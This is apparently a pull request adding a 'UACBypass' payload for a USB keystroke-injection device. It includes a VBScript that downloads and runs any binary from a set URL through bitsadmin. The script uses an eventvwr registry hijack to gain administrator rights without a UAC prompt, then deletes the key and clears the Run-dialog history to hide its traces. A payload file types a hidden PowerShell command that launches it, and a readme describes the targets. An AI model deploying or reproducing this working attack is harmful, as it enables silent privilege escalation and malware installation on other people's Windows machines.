### PR TITLE
UAC-Ducky ported to UAC-Bunny

### DIFF
--- a/payloads/library/UACBypass/a.vbs
+++ b/payloads/library/UACBypass/a.vbs
@@ -2,8 +2,8 @@ Sub Main()
 
 
 	'Userdefined payload settings
-	 URL = "https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe"
-	 SAVE_NAME = "putty.exe"
+	URL = "XX" '<- You binary direct link
+	SAVE_NAME = "pxx.exe" '<-- The what file should be named when dropped on system
 	
 	'Download File
 	CreateObject("WScript.Shell").run("cmd /c bitsadmin /transfer SoftUpdate /download /priority FOREGROUND " + URL + " %temp%/" + SAVE_NAME + ""),0,true

--- a/payloads/library/UACBypass/a.vbs
+++ b/payloads/library/UACBypass/a.vbs
@@ -1,0 +1,33 @@
+Sub Main()
+
+
+	'Userdefined payload settings
+	 URL = "https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe"
+	 SAVE_NAME = "putty.exe"
+	
+	'Download File
+	CreateObject("WScript.Shell").run("cmd /c bitsadmin /transfer SoftUpdate /download /priority FOREGROUND " + URL + " %temp%/" + SAVE_NAME + ""),0,true
+	
+	'Write UAC bypass regkey
+	CreateObject("WScript.Shell").RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) +"\" + SAVE_NAME ,"REG_SZ"
+	
+	'Trigger UAC bypass
+	CreateObject("WScript.Shell").Run("eventvwr.exe"),0,true
+	
+	'Reset regkey 
+	GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & "." & "\root\default:StdRegProv").DeleteValue &H80000001,"Software\Classes\mscfile\shell\open\command\",""
+	
+	'Clear the run-dialog history
+	CreateObject("WScript.Shell").Run("cmd.exe /C reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f "),0,true
+End Sub 
+
+On Error Resume Next
+
+  Main
+
+
+  If Err.Number Then
+
+     WScript.Quit 4711
+
+End If

--- a/payloads/library/UACBypass/a.vbs
+++ b/payloads/library/UACBypass/a.vbs
@@ -3,7 +3,7 @@ Sub Main()
 
 	'Userdefined payload settings
 	URL = "XX" '<- You binary direct link
-	SAVE_NAME = "pxx.exe" '<-- The what file should be named when dropped on system
+	SAVE_NAME = "pxx.exe" '<-- what file should be named when dropped on system
 	
 	'Download File
 	CreateObject("WScript.Shell").run("cmd /c bitsadmin /transfer SoftUpdate /download /priority FOREGROUND " + URL + " %temp%/" + SAVE_NAME + ""),0,true

--- a/payloads/library/UACBypass/payload.txt
+++ b/payloads/library/UACBypass/payload.txt
@@ -21,7 +21,7 @@ source bunny_helpers.sh
 LED R
 
 #We are a keyboard
-ATTACKMODE HID
+ATTACKMODE HID STORAGE
 
 #Set keyboard language
 QUACK SET_LANGUAGE en

--- a/payloads/library/UACBypass/payload.txt
+++ b/payloads/library/UACBypass/payload.txt
@@ -1,0 +1,37 @@
+# Title:         UACBypass
+# Author:        Skiddie
+# Version:       1.0
+# Target:        Windows
+# 
+# Download and executes any binary executable with administrator privileges WITHOUT
+# prompting the user for administrator rights (aka UAC bypass/exploit)
+# Please define URL and SAVEFILENAME in the a.vbs script 
+# Works on Windows 7 - Windows 10
+# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges 
+# However from what i am aware version 7,8 and 8.1 are still effected 
+# Still the fastest download and execute for HID attacks to date. 
+
+#Define your bunny storage stick name
+DRIVER_LABEL='BashBunny'
+
+#To get the $SWITCH_POSITION var
+source bunny_helpers.sh
+
+#RED means starting
+LED R
+
+#We are a keyboard
+ATTACKMODE HID
+
+#Set keyboard language
+QUACK SET_LANGUAGE en
+
+QUACK DELAY 500
+QUACK GUI r
+QUACK DELAY 100
+QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'payloads\\$SWITCH_POSITION\a.vbs')"
+QUACK ENTER
+
+# GREEN means finished
+LED G
+

--- a/payloads/library/UACBypass/readme.md
+++ b/payloads/library/UACBypass/readme.md
@@ -1,0 +1,32 @@
+# UACBypass / UACExploit -  Download and executes any binary executable with administrator privileges WITHOUT UAC prompting for access
+
+Author: @SkiddieTech 
+Version: Version 1.0
+Target:  Windows 7 - Windows 10 
+
+## Description
+
+Download and executes any binary executable with administrator privileges WITHOUT
+prompting the user for administrator rights (aka UAC bypass/exploit)
+Please define URL and SAVEFILENAME in the a.vbs script 
+Tested working on Windows 7 - Windows 10
+The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges 
+However from what i am aware 7, 8 and 8.1 are still effected 
+Still the fastest download and execute for HID attacks to date. 
+
+## Configuration
+
+HID or HID STORAGE
+
+## Requirements
+
+Target must be an Windows box with an working internet connection,powershell and vb script enabled (It is enabled by default) 
+Please edit the a.vbs script with your binary payload URL and savename 
+
+## STATUS
+
+| LED              | Status                                |
+| ---------------- | ------------------------------------- |
+| Red              | Script is starting                    |
+| Green            | Finished                              |
+


### PR DESCRIPTION
This is the ported version of the original UAC-Ducky (https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky) made by me as featured in the episode of HAK5 - 2117.

Download and executes any binary as admin, blazing fast, without triggering the admin / UAC prompt on windows machines until Win10 -1607

